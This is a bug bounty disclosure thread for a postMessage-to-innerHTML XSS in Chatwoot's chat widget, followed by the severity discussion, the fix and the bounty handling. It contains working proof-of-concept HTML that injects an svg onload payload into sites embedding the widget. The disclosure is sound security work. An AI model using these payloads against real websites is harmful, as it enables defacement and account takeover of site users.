XSS via postMessage to deface any website and account takeover in chatwoot/chatwoot

Valid

Reported on

Feb 2nd 2023

Description

Hey Chatwoot team, while looking for vulnerabilities I found a critical XSS which allow us to XSS/Deface any website which uses the chat, this can be automated to attack thousands of websites

Vulnerable Code

Inside this function https://github.com/chatwoot/chatwoot/blob/30fcb47477481772c9a447f7406af3a72be26ed1/app/javascript/sdk/bubbleHelpers.js#L16

We have this code:

export const setBubbleText = bubbleText => {
  if (isExpandedView(window.$chatwoot.type)) {
    const textNode = document.getElementById('woot-widget--expanded__text');
    textNode.innerHTML = bubbleText;
  }
};

The code uses dangerous JS function innerHTML with bubbleText value the problem is we control value of this variable inside the postMessage function.

Proof of Concept

<body onclick=x()><h1>Click here
<script>
var w;
function x(){
w=window.open('https://www.chatwoot.com/','w');

setTimeout(()=>{
w.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='document.body.innerHTML=&quot;<br><br><h1 style=color:red;font-size:99px>pwned&quot;'>"}`,'*')
}
,5000)
}
</script>

Online POC

https://pwr.wtf/chatw.html

Thanks Renwa

Impact

This bug can be used to takeover accounts of websites which uses Chatboot and deface any page on their site which leads to huge lose and reputation, No user interaction is required and the attack is simple just by visiting a webpage the attacker can launch the attack and target mass victims.

Occurrences

Change innerHTML to innerText to fix this vulnerability

We are processing your report and will contact the chatwoot team within 24 hours. 10 months ago
We have contacted a member of the chatwoot team and are waiting to hear back 10 months ago
Renwa
10 months ago

Researcher

Here is another POC which doesn't require any user interaction which makes the attack more critical: https://pwr.wtf/chatw2.html

<body><h1>Please wait
<iframe name=win src=https://www.chatwoot.com/></iframe>
<script>

setTimeout(()=>{
win.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='alert(&quot;XSS on: &quot;+document.domain)'>"}`,'*')
}
,5000)


</script>
Sojan Jose modified the Severity from Critical (9.8) to Medium (5.3) 10 months ago
Sojan Jose gave praise 10 months ago
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
chatwoot/chatwoot maintainer has acknowledged this report 10 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Sojan Jose validated this vulnerability 10 months ago
Renwa has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Renwa
10 months ago

Researcher

Sorry but why the severity is Medium, this should be high as I have provided a POC which doesn't require user interaction.

Also these are all XSS bugs like mine which has high severity reported to chatwoot:

https://huntr.dev/bounties/1-other-chatwoot/ https://huntr.dev/bounties/e6469ba6-03a2-4b17-8b4e-8932ecd0f7ac/ https://huntr.dev/bounties/1625474692857-chatwoot/chatwoot/ https://huntr.dev/bounties/d8f5ce74-2a00-4813-b220-70af771b0edd/

Sojan Jose
10 months ago

Maintainer

@Renwa Thanks again for the report. We have started using the CVSS calculator for the reports since we will be publishing CVE for these reports. In these cases, user interaction is required since the user must click on the malicious link.

reference: https://www.first.org/cvss/examples (example 25)

Let me know if you have questions about any of the other values.

Sojan Jose
10 months ago

Maintainer

note: A fix has been merged to develop via : https://github.com/chatwoot/chatwoot/commit/a06a5a574ad908b0ef2db7b47d05c3774eeb493d

This change will be available in the upcoming release. 2.14.0

Renwa
10 months ago

Researcher

The fix looks alright, It's the same I suggested to do I think I can get the fix bounty too.

Thanks

Sojan Jose
10 months ago

Maintainer

@Renwa, we will make sure to attribute it under your name when we mark it as fixed along with the release. Thanks for verifying.

Sojan Jose
10 months ago

Maintainer

@renwa, you will need to attach a fix to the issue for us to issue the fix bounty. otherwise huntr is not showing me the option to attribute it to your name

Renwa
10 months ago

Researcher

Hey Sojan, How I can do that, my Github username is RenwaX23 Should we contact huntr to see how its done?

Sojan Jose
10 months ago

Maintainer

@Renwa, Please give that a try. The maintainer interface is different than the researcher one i think

Renwa
9 months ago

Researcher

Tagging admin as I was told in support @admin

Ben Harvie
9 months ago

Admin

Please click the "Mark as fixed" button at the bottom of the page, you can credit the fixer during this process and choose to assign a CVE.

Sojan Jose
9 months ago

Maintainer

@Ben Harvie the Mark as fixed option only lets me choose nobody or me(sojan-official) . is it because the the fixer is populated from the github commit ?

Renwa
9 months ago

Researcher

@admin

Renwa
9 months ago

Researcher

@admin

Ben Harvie
9 months ago

Admin

@Sojan, yes that's correct, only the committer can be assigned the fix credibility.

Sojan Jose
9 months ago

Maintainer

Great work @renwax23 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.

note: trying this flow flow out

Renwa submitted a
patch
9 months ago
Renwa
9 months ago

Researcher

I think I submitted the patch maybe this time it shows me inside the patch bounty selection

Sojan Jose marked this as fixed in 2.14.0 with commit a06a5a 9 months ago
Renwa has been awarded the fix bounty
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Apr 17th 2023
bubbleHelpers.js#L19 has been validated
Sojan Jose published this vulnerability 7 months ago
to join this conversation